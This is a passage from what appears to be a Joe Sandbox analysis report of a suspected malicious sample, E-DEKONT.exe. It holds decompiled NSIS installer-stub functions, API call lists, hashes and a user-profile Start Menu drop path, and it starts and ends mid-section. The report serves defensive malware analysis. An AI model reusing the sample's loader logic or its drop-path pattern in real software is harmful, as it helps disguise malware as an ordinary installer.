                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                            • String ID:
                                                                            • API String ID: 3282139019-0
                                                                            • Opcode ID: d98e6c65d60d857f3aa4eca315e3afb6b45dd94bb5928597cafe6023f70925fc
                                                                            • Instruction ID: 2b8d66c2e1a38ac8fa8a62e4dcdff4cf04ad9fa750ea4aef2484392c4ac96c84
                                                                            • Opcode Fuzzy Hash: d98e6c65d60d857f3aa4eca315e3afb6b45dd94bb5928597cafe6023f70925fc
                                                                            • Instruction Fuzzy Hash: 3EC1D2B1600200AFDB216F61ED89E2B3A68FB94706F04057EF641B51F1CB799982DB6D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 366 403990-4039a8 call 40665c 369 4039aa-4039b5 GetUserDefaultUILanguage call 4061c9 366->369 370 4039bc-4039f3 call 406150 366->370 373 4039ba 369->373 376 4039f5-403a06 call 406150 370->376 377 403a0b-403a11 lstrcatW 370->377 375 403a16-403a3f call 403c66 call 405c5b 373->375 383 403ad1-403ad9 call 405c5b 375->383 384 403a45-403a4a 375->384 376->377 377->375 390 403ae7-403b0c LoadImageW 383->390 391 403adb-403ae2 call 4062a4 383->391 384->383 386 403a50-403a6a call 406150 384->386 389 403a6f-403a78 386->389 389->383 392 403a7a-403a7e 389->392 394 403b8d-403b95 call 40140b 390->394 395 403b0e-403b3e RegisterClassW 390->395 391->390 396 403a90-403a9c lstrlenW 392->396 397 403a80-403a8d call 405b80 392->397 408 403b97-403b9a 394->408 409 403b9f-403baa call 403c66 394->409 398 403b44-403b88 SystemParametersInfoW CreateWindowExW 395->398 399 403c5c 395->399 403 403ac4-403acc call 405b53 call 406282 396->403 404 403a9e-403aac lstrcmpiW 396->404 397->396 398->394 402 403c5e-403c65 399->402 403->383 404->403 407 403aae-403ab8 GetFileAttributesW 404->407 411 403aba-403abc 407->411 412 403abe-403abf call 405b9f 407->412 408->402 418 403bb0-403bca ShowWindow call 4065ec 409->418 419 403c33-403c3b call 4053b9 409->419 411->403 411->412 412->403 424 403bd6-403be8 GetClassInfoW 418->424 425 403bcc-403bd1 call 4065ec 418->425 426 403c55-403c57 call 40140b 419->426 427 403c3d-403c43 419->427 430 403c00-403c23 DialogBoxParamW call 40140b 424->430 431 403bea-403bfa GetClassInfoW RegisterClassW 424->431 425->424 426->399 427->408 432 403c49-403c50 call 40140b 427->432 436 403c28-403c31 call 4038e0 430->436 431->430 432->408 436->402
                                                                            C-Code - Quality: 96%
                                                                            			E00403990(void* __eflags) {
                                                                            				intOrPtr _v4;
                                                                            				intOrPtr _v8;
                                                                            				int _v12;
                                                                            				void _v16;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				intOrPtr* _t22;
                                                                            				void* _t30;
                                                                            				void* _t32;
                                                                            				int _t33;
                                                                            				void* _t36;
                                                                            				int _t39;
                                                                            				int _t40;
                                                                            				int _t44;
                                                                            				short _t63;
                                                                            				WCHAR* _t65;
                                                                            				signed char _t69;
                                                                            				signed short _t73;
                                                                            				WCHAR* _t76;
                                                                            				intOrPtr _t82;
                                                                            				WCHAR* _t87;
                                                                            
                                                                            				_t82 =  *0x434ef4;
                                                                            				_t22 = E0040665C(2);
                                                                            				_t90 = _t22;
                                                                            				if(_t22 == 0) {
                                                                            					_t76 = 0x42d248;
                                                                            					L"1033" = 0x30;
                                                                            					 *0x441002 = 0x78;
                                                                            					 *0x441004 = 0;
                                                                            					E00406150(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x42d248, 0);
                                                                            					__eflags =  *0x42d248;
                                                                            					if(__eflags == 0) {
                                                                            						E00406150(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083CC, 0x42d248, 0);
                                                                            					}
                                                                            					lstrcatW(L"1033", _t76);
                                                                            				} else {
                                                                            					_t73 =  *_t22(); // executed
                                                                            					E004061C9(L"1033", _t73 & 0x0000ffff);
                                                                            				}
                                                                            				E00403C66(_t78, _t90);
                                                                            				_t86 = L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Ydervgg\\Superassume\\dodecaheddra";
                                                                            				 *0x434f80 =  *0x434efc & 0x00000020;
                                                                            				 *0x434f9c = 0x10000;
                                                                            				if(E00405C5B(_t90, L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Ydervgg\\Superassume\\dodecaheddra") != 0) {
                                                                            					L16:
                                                                            					if(E00405C5B(_t98, _t86) == 0) {
                                                                            						E004062A4(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118))); // executed
                                                                            					}
                                                                            					_t30 = LoadImageW( *0x434ee0, 0x67, 1, 0, 0, 0x8040); // executed
                                                                            					 *0x433ec8 = _t30;
                                                                            					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                                                            						L21:
                                                                            						if(E0040140B(0) == 0) {
                                                                            							_t32 = E00403C66(_t78, __eflags);
                                                                            							__eflags =  *0x434fa0;
                                                                            							if( *0x434fa0 != 0) {
                                                                            								_t33 = E004053B9(_t32, 0);
                                                                            								__eflags = _t33;
                                                                            								if(_t33 == 0) {
                                                                            									E0040140B(1);
                                                                            									goto L33;
                                                                            								}
                                                                            								__eflags =  *0x433eac;
                                                                            								if( *0x433eac == 0) {
                                                                            									E0040140B(2);
                                                                            								}
                                                                            								goto L22;
                                                                            							}
                                                                            							ShowWindow( *0x42d228, 5); // executed
                                                                            							_t39 = E004065EC("RichEd20"); // executed
                                                                            							__eflags = _t39;
                                                                            							if(_t39 == 0) {
                                                                            								E004065EC("RichEd32");
                                                                            							}
                                                                            							_t87 = L"RichEdit20W";
                                                                            							_t40 = GetClassInfoW(0, _t87, 0x433e80);
                                                                            							__eflags = _t40;
                                                                            							if(_t40 == 0) {
                                                                            								GetClassInfoW(0, L"RichEdit", 0x433e80);
                                                                            								 *0x433ea4 = _t87;
                                                                            								RegisterClassW(0x433e80);
                                                                            							}
                                                                            							_t44 = DialogBoxParamW( *0x434ee0,  *0x433ec0 + 0x00000069 & 0x0000ffff, 0, E00403D3E, 0); // executed
                                                                            							E004038E0(E0040140B(5), 1);
                                                                            							return _t44;
                                                                            						}
                                                                            						L22:
                                                                            						_t36 = 2;
                                                                            						return _t36;
                                                                            					} else {
                                                                            						_t78 =  *0x434ee0;
                                                                            						 *0x433e84 = E00401000;
                                                                            						 *0x433e90 =  *0x434ee0;
                                                                            						 *0x433e94 = _t30;
                                                                            						 *0x433ea4 = 0x40a380;
                                                                            						if(RegisterClassW(0x433e80) == 0) {
                                                                            							L33:
                                                                            							__eflags = 0;
                                                                            							return 0;
                                                                            						}
                                                                            						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                                                            						 *0x42d228 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x434ee0, 0);
                                                                            						goto L21;
                                                                            					}
                                                                            				} else {
                                                                            					_t78 =  *(_t82 + 0x48);
                                                                            					_t92 = _t78;
                                                                            					if(_t78 == 0) {
                                                                            						goto L16;
                                                                            					}
                                                                            					_t76 = 0x432e80;
                                                                            					E00406150(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x434f38 + _t78 * 2,  *0x434f38 +  *(_t82 + 0x4c) * 2, 0x432e80, 0);
                                                                            					_t63 =  *0x432e80; // 0x43
                                                                            					if(_t63 == 0) {
                                                                            						goto L16;
                                                                            					}
                                                                            					if(_t63 == 0x22) {
                                                                            						_t76 = 0x432e82;
                                                                            						 *((short*)(E00405B80(0x432e82, 0x22))) = 0;
                                                                            					}
                                                                            					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                                                            					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                                                            						L15:
                                                                            						E00406282(_t86, E00405B53(_t76));
                                                                            						goto L16;
                                                                            					} else {
                                                                            						_t69 = GetFileAttributesW(_t76);
                                                                            						if(_t69 == 0xffffffff) {
                                                                            							L14:
                                                                            							E00405B9F(_t76);
                                                                            							goto L15;
                                                                            						}
                                                                            						_t98 = _t69 & 0x00000010;
                                                                            						if((_t69 & 0x00000010) != 0) {
                                                                            							goto L15;
                                                                            						}
                                                                            						goto L14;
                                                                            					}
                                                                            				}
                                                                            			}


























                                                                            APIs
                                                                              • Part of subcall function 0040665C: GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                                              • Part of subcall function 0040665C: GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                                            • GetUserDefaultUILanguage.KERNELBASE(00000002,C:\Users\user\AppData\Local\Temp\,75F63420,"C:\Users\user\Desktop\E-DEKONT.exe",00000000), ref: 004039AA
                                                                              • Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6
                                                                            • lstrcatW.KERNEL32(1033,0042D248), ref: 00403A11
                                                                            • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A91
                                                                            • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 00403AA4
                                                                            • GetFileAttributesW.KERNEL32(Call), ref: 00403AAF
                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra), ref: 00403AF8
                                                                            • RegisterClassW.USER32(00433E80), ref: 00403B35
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B4D
                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B82
                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403BB8
                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403BE4
                                                                            • GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403BF1
                                                                            • RegisterClassW.USER32(00433E80), ref: 00403BFA
                                                                            • DialogBoxParamW.USER32(?,00000000,00403D3E,00000000), ref: 00403C19
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                            • String ID: "C:\Users\user\Desktop\E-DEKONT.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                            • API String ID: 606308-1182076736
                                                                            • Opcode ID: d13a808758802c6e3fc48dc76d19d1d1e2605ae81d2ad2d57bfa7261d619400b
                                                                            • Instruction ID: b69a5953a59a380dedfc974e339360e26c19c43312473aa69c5b527d033ca56b
                                                                            • Opcode Fuzzy Hash: d13a808758802c6e3fc48dc76d19d1d1e2605ae81d2ad2d57bfa7261d619400b
                                                                            • Instruction Fuzzy Hash: 7061A8312003006ED320BF669D46F673A6CEB84B5AF40053FF945B62E2DB7DA9418A2D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            C-Code - Quality: 80%
                                                                            			E00402EC1(void* __eflags, signed int _a4) {
                                                                            				DWORD* _v8;
                                                                            				DWORD* _v12;
                                                                            				void* _v16;
                                                                            				intOrPtr _v20;
                                                                            				long _v24;
                                                                            				intOrPtr _v28;
                                                                            				intOrPtr _v32;
                                                                            				intOrPtr _v36;
                                                                            				intOrPtr _v40;
                                                                            				signed int _v44;
                                                                            				long _t43;
                                                                            				signed int _t50;
                                                                            				void* _t53;
                                                                            				void* _t57;
                                                                            				intOrPtr* _t59;
                                                                            				long _t60;
                                                                            				signed int _t65;
                                                                            				signed int _t70;
                                                                            				signed int _t71;
                                                                            				signed int _t77;
                                                                            				intOrPtr _t80;
                                                                            				long _t82;
                                                                            				signed int _t85;
                                                                            				signed int _t87;
                                                                            				void* _t89;
                                                                            				signed int _t90;
                                                                            				signed int _t93;
                                                                            				void* _t94;
                                                                            
                                                                            				_t82 = 0;
                                                                            				_v12 = 0;
                                                                            				_v8 = 0;
                                                                            				_t43 = GetTickCount();
                                                                            				_t91 = L"C:\\Users\\Arthur\\Desktop\\E-DEKONT.exe";
                                                                            				 *0x434ef0 = _t43 + 0x3e8;
                                                                            				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\E-DEKONT.exe", 0x400);
                                                                            				_t89 = E00405D74(_t91, 0x80000000, 3);
                                                                            				_v16 = _t89;
                                                                            				 *0x40a018 = _t89;
                                                                            				if(_t89 == 0xffffffff) {
                                                                            					return L"Error launching installer";
                                                                            				}
                                                                            				_t92 = L"C:\\Users\\Arthur\\Desktop";
                                                                            				E00406282(L"C:\\Users\\Arthur\\Desktop", _t91);
                                                                            				E00406282(0x443000, E00405B9F(_t92));
                                                                            				_t50 = GetFileSize(_t89, 0);
                                                                            				__eflags = _t50;
                                                                            				 *0x422a04 = _t50;
                                                                            				_t93 = _t50;
                                                                            				if(_t50 <= 0) {
                                                                            					L24:
                                                                            					E00402E5D(1);
                                                                            					__eflags =  *0x434ef8 - _t82;
                                                                            					if( *0x434ef8 == _t82) {
                                                                            						goto L29;
                                                                            					}
                                                                            					__eflags = _v8 - _t82;
                                                                            					if(_v8 == _t82) {
                                                                            						L28:
                                                                            						_t53 = GlobalAlloc(0x40, _v24); // executed
                                                                            						_t94 = _t53;
                                                                            						E0040332B( *0x434ef8 + 0x1c);
                                                                            						_push(_v24);
                                                                            						_push(_t94);
                                                                            						_push(_t82);
                                                                            						_push(0xffffffff); // executed
                                                                            						_t57 = E004030FA(); // executed
                                                                            						__eflags = _t57 - _v24;
                                                                            						if(_t57 == _v24) {
                                                                            							__eflags = _v44 & 0x00000001;
                                                                            							 *0x434ef4 = _t94;
                                                                            							 *0x434efc =  *_t94;
                                                                            							if((_v44 & 0x00000001) != 0) {
                                                                            								 *0x434f00 =  *0x434f00 + 1;
                                                                            								__eflags =  *0x434f00;
                                                                            							}
                                                                            							_t40 = _t94 + 0x44; // 0x44
                                                                            							_t59 = _t40;
                                                                            							_t85 = 8;
                                                                            							do {
                                                                            								_t59 = _t59 - 8;
                                                                            								 *_t59 =  *_t59 + _t94;
                                                                            								_t85 = _t85 - 1;
                                                                            								__eflags = _t85;
                                                                            							} while (_t85 != 0);
                                                                            							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                                                            							 *(_t94 + 0x3c) = _t60;
                                                                            							E00405D2F(0x434f20, _t94 + 4, 0x40);
                                                                            							__eflags = 0;
                                                                            							return 0;
                                                                            						}
                                                                            						goto L29;
                                                                            					}
                                                                            					E0040332B( *0x4169f8);
                                                                            					_t65 = E00403315( &_a4, 4);
                                                                            					__eflags = _t65;
                                                                            					if(_t65 == 0) {
                                                                            						goto L29;
                                                                            					}
                                                                            					__eflags = _v12 - _a4;
                                                                            					if(_v12 != _a4) {
                                                                            						goto L29;
                                                                            					}
                                                                            					goto L28;
                                                                            				} else {
                                                                            					do {
                                                                            						_t90 = _t93;
                                                                            						asm("sbb eax, eax");
                                                                            						_t70 = ( ~( *0x434ef8) & 0x00007e00) + 0x200;
                                                                            						__eflags = _t93 - _t70;
                                                                            						if(_t93 >= _t70) {
                                                                            							_t90 = _t70;
                                                                            						}
                                                                            						_t71 = E00403315(0x422a08, _t90);
                                                                            						__eflags = _t71;
                                                                            						if(_t71 == 0) {
                                                                            							E00402E5D(1);
                                                                            							L29:
                                                                            							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                                            						}
                                                                            						__eflags =  *0x434ef8;
                                                                            						if( *0x434ef8 != 0) {
                                                                            							__eflags = _a4 & 0x00000002;
                                                                            							if((_a4 & 0x00000002) == 0) {
                                                                            								E00402E5D(0);
                                                                            							}
                                                                            							goto L20;
                                                                            						}
                                                                            						E00405D2F( &_v44, 0x422a08, 0x1c);
                                                                            						_t77 = _v44;
                                                                            						__eflags = _t77 & 0xfffffff0;
                                                                            						if((_t77 & 0xfffffff0) != 0) {
                                                                            							goto L20;
                                                                            						}
                                                                            						__eflags = _v40 - 0xdeadbeef;
                                                                            						if(_v40 != 0xdeadbeef) {
                                                                            							goto L20;
                                                                            						}
                                                                            						__eflags = _v28 - 0x74736e49;
                                                                            						if(_v28 != 0x74736e49) {
                                                                            							goto L20;
                                                                            						}
                                                                            						__eflags = _v32 - 0x74666f73;
                                                                            						if(_v32 != 0x74666f73) {
                                                                            							goto L20;
                                                                            						}
                                                                            						__eflags = _v36 - 0x6c6c754e;
                                                                            						if(_v36 != 0x6c6c754e) {
                                                                            							goto L20;
                                                                            						}
                                                                            						_a4 = _a4 | _t77;
                                                                            						_t87 =  *0x4169f8; // 0x4f892
                                                                            						 *0x434fa0 =  *0x434fa0 | _a4 & 0x00000002;
                                                                            						_t80 = _v20;
                                                                            						__eflags = _t80 - _t93;
                                                                            						 *0x434ef8 = _t87;
                                                                            						if(_t80 > _t93) {
                                                                            							goto L29;
                                                                            						}
                                                                            						__eflags = _a4 & 0x00000008;
                                                                            						if((_a4 & 0x00000008) != 0) {
                                                                            							L16:
                                                                            							_v8 = _v8 + 1;
                                                                            							_t24 = _t80 - 4; // 0x40a2dc
                                                                            							_t93 = _t24;
                                                                            							__eflags = _t90 - _t93;
                                                                            							if(_t90 > _t93) {
                                                                            								_t90 = _t93;
                                                                            							}
                                                                            							goto L20;
                                                                            						}
                                                                            						__eflags = _a4 & 0x00000004;
                                                                            						if((_a4 & 0x00000004) != 0) {
                                                                            							break;
                                                                            						}
                                                                            						goto L16;
                                                                            						L20:
                                                                            						__eflags = _t93 -  *0x422a04; // 0x4f896
                                                                            						if(__eflags < 0) {
                                                                            							_v12 = E0040674F(_v12, 0x422a08, _t90);
                                                                            						}
                                                                            						 *0x4169f8 =  *0x4169f8 + _t90;
                                                                            						_t93 = _t93 - _t90;
                                                                            						__eflags = _t93;
                                                                            					} while (_t93 > 0);
                                                                            					_t82 = 0;
                                                                            					__eflags = 0;
                                                                            					goto L24;
                                                                            				}
                                                                            			}
































                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 00402ED2
                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\E-DEKONT.exe,00000400,?,00000006,00000008,0000000A), ref: 00402EEE
                                                                              • Part of subcall function 00405D74: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\E-DEKONT.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                                              • Part of subcall function 00405D74: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                                            • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\E-DEKONT.exe,C:\Users\user\Desktop\E-DEKONT.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                            • String ID: "C:\Users\user\Desktop\E-DEKONT.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\E-DEKONT.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                            • API String ID: 4283519449-2187476416
                                                                            • Opcode ID: 63e69acdaec1fdaba5d4a89e2a3b5318abe59b2b0843af0c7679ee6c60d0c948
                                                                            • Instruction ID: 5fb561c1f1da7fe65fe29aa304fda9dad36d264b5387f138e6185790fd874317
                                                                            • Opcode Fuzzy Hash: 63e69acdaec1fdaba5d4a89e2a3b5318abe59b2b0843af0c7679ee6c60d0c948
                                                                            • Instruction Fuzzy Hash: 18510471902216AFDB20AF64DD85B9E7EB8FB00359F15403BF904B62C5C7789E408B6C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 770 4062a4-4062af 771 4062b1-4062c0 770->771 772 4062c2-4062d8 770->772 771->772 773 4064f0-4064f6 772->773 774 4062de-4062eb 772->774 775 4064fc-406507 773->775 776 4062fd-40630a 773->776 774->773 777 4062f1-4062f8 774->777 779 406512-406513 775->779 780 406509-40650d call 406282 775->780 776->775 778 406310-40631c 776->778 777->773 781 406322-406360 778->781 782 4064dd 778->782 780->779 784 406480-406484 781->784 785 406366-406371 781->785 786 4064eb-4064ee 782->786 787 4064df-4064e9 782->787 790 406486-40648c 784->790 791 4064b7-4064bb 784->791 788 406373-406378 785->788 789 40638a 785->789 786->773 787->773 788->789 794 40637a-40637d 788->794 797 406391-406398 789->797 795 40649c-4064a8 call 406282 790->795 796 40648e-40649a call 4061c9 790->796 792 4064ca-4064db lstrlenW 791->792 793 4064bd-4064c5 call 4062a4 791->793 792->773 793->792 794->789 799 40637f-406382 794->799 808 4064ad-4064b3 795->808 796->808 801 40639a-40639c 797->801 802 40639d-40639f 797->802 799->789 804 406384-406388 799->804 801->802 806 4063a1-4063bf call 406150 802->806 807 4063da-4063dd 802->807 804->797 816 4063c4-4063c8 806->816 809 4063ed-4063f0 807->809 810 4063df-4063eb GetSystemDirectoryW 807->810 808->792 812 4064b5 808->812 814 4063f2-406400 GetWindowsDirectoryW 809->814 815 40645b-40645d 809->815 813 40645f-406463 810->813 817 406478-40647e call 406516 812->817 813->817 818 406465 813->818 814->815 815->813 820 406402-40640c 815->820 821 406468-40646b 816->821 822 4063ce-4063d5 call 4062a4 816->822 817->792 818->821 826 406426-40643c SHGetSpecialFolderLocation 820->826 827 40640e-406411 820->827 821->817 824 40646d-406473 lstrcatW 821->824 822->813 824->817 830 406457 826->830 831 40643e-406455 SHGetPathFromIDListW CoTaskMemFree 826->831 827->826 829 406413-40641a 827->829 832 406422-406424 829->832 830->815 831->813 831->830 832->813 832->826
                                                                            C-Code - Quality: 72%
                                                                            			E004062A4(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                                            				signed int _v8;
                                                                            				struct _ITEMIDLIST* _v12;
                                                                            				signed int _v16;
                                                                            				signed int _v20;
                                                                            				signed int _v24;
                                                                            				signed int _v28;
                                                                            				signed int _t43;
                                                                            				WCHAR* _t44;
                                                                            				signed char _t46;
                                                                            				signed int _t47;
                                                                            				signed int _t48;
                                                                            				short _t58;
                                                                            				short _t60;
                                                                            				short _t62;
                                                                            				void* _t70;
                                                                            				signed int _t76;
                                                                            				void* _t82;
                                                                            				signed char _t83;
                                                                            				short _t86;
                                                                            				signed int _t96;
                                                                            				void* _t102;
                                                                            				short _t103;
                                                                            				signed int _t106;
                                                                            				signed int _t108;
                                                                            				void* _t109;
                                                                            				WCHAR* _t110;
                                                                            				void* _t112;
                                                                            
                                                                            				_t109 = __esi;
                                                                            				_t102 = __edi;
                                                                            				_t70 = __ebx;
                                                                            				_t43 = _a8;
                                                                            				if(_t43 < 0) {
                                                                            					_t43 =  *( *0x433ebc - 4 + _t43 * 4);
                                                                            				}
                                                                            				_push(_t70);
                                                                            				_push(_t109);
                                                                            				_push(_t102);
                                                                            				_t96 =  *0x434f38 + _t43 * 2;
                                                                            				_t44 = 0x432e80;
                                                                            				_t110 = 0x432e80;
                                                                            				if(_a4 >= 0x432e80 && _a4 - 0x432e80 >> 1 < 0x800) {
                                                                            					_t110 = _a4;
                                                                            					_a4 = _a4 & 0x00000000;
                                                                            				}
                                                                            				while(1) {
                                                                            					_t103 =  *_t96;
                                                                            					if(_t103 == 0) {
                                                                            						break;
                                                                            					}
                                                                            					__eflags = (_t110 - _t44 & 0xfffffffe) - 0x800;
                                                                            					if((_t110 - _t44 & 0xfffffffe) >= 0x800) {
                                                                            						break;
                                                                            					}
                                                                            					_t82 = 2;
                                                                            					_t96 = _t96 + _t82;
                                                                            					__eflags = _t103 - 4;
                                                                            					_a8 = _t96;
                                                                            					if(__eflags >= 0) {
                                                                            						if(__eflags != 0) {
                                                                            							 *_t110 = _t103;
                                                                            							_t110 = _t110 + _t82;
                                                                            							__eflags = _t110;
                                                                            						} else {
                                                                            							 *_t110 =  *_t96;
                                                                            							_t110 = _t110 + _t82;
                                                                            							_t96 = _t96 + _t82;
                                                                            						}
                                                                            						continue;
                                                                            					}
                                                                            					_t83 =  *((intOrPtr*)(_t96 + 1));
                                                                            					_t46 =  *_t96;
                                                                            					_t47 = _t46 & 0x000000ff;
                                                                            					_v8 = (_t83 & 0x0000007f) << 0x00000007 | _t46 & 0x0000007f;
                                                                            					_a8 = _a8 + 2;
                                                                            					_v28 = _t47 | 0x00008000;
                                                                            					_v24 = _t47;
                                                                            					_t76 = _t83 & 0x000000ff;
                                                                            					_v16 = _t76;
                                                                            					__eflags = _t103 - 2;
                                                                            					_v20 = _t76 | 0x00008000;
                                                                            					if(_t103 != 2) {
                                                                            						__eflags = _t103 - 3;
                                                                            						if(_t103 != 3) {
                                                                            							__eflags = _t103 - 1;
                                                                            							if(_t103 == 1) {
                                                                            								__eflags = (_t47 | 0xffffffff) - _v8;
                                                                            								E004062A4(_t76, _t103, _t110, _t110, (_t47 | 0xffffffff) - _v8);
                                                                            							}
                                                                            							L43:
                                                                            							_t48 = lstrlenW(_t110);
                                                                            							_t96 = _a8;
                                                                            							_t110 =  &(_t110[_t48]);
                                                                            							_t44 = 0x432e80;
                                                                            							continue;
                                                                            						}
                                                                            						_t106 = _v8;
                                                                            						__eflags = _t106 - 0x1d;
                                                                            						if(_t106 != 0x1d) {
                                                                            							__eflags = (_t106 << 0xb) + 0x435000;
                                                                            							E00406282(_t110, (_t106 << 0xb) + 0x435000);
                                                                            						} else {
                                                                            							E004061C9(_t110,  *0x434ee8);
                                                                            						}
                                                                            						__eflags = _t106 + 0xffffffeb - 7;
                                                                            						if(_t106 + 0xffffffeb < 7) {
                                                                            							L34:
                                                                            							E00406516(_t110);
                                                                            						}
                                                                            						goto L43;
                                                                            					}
                                                                            					_t86 =  *0x434eec;
                                                                            					__eflags = _t86;
                                                                            					_t108 = 2;
                                                                            					if(_t86 >= 0) {
                                                                            						L13:
                                                                            						_v8 = 1;
                                                                            						L14:
                                                                            						__eflags =  *0x434f84;
                                                                            						if( *0x434f84 != 0) {
                                                                            							_t108 = 4;
                                                                            						}
                                                                            						__eflags = _t47;
                                                                            						if(__eflags >= 0) {
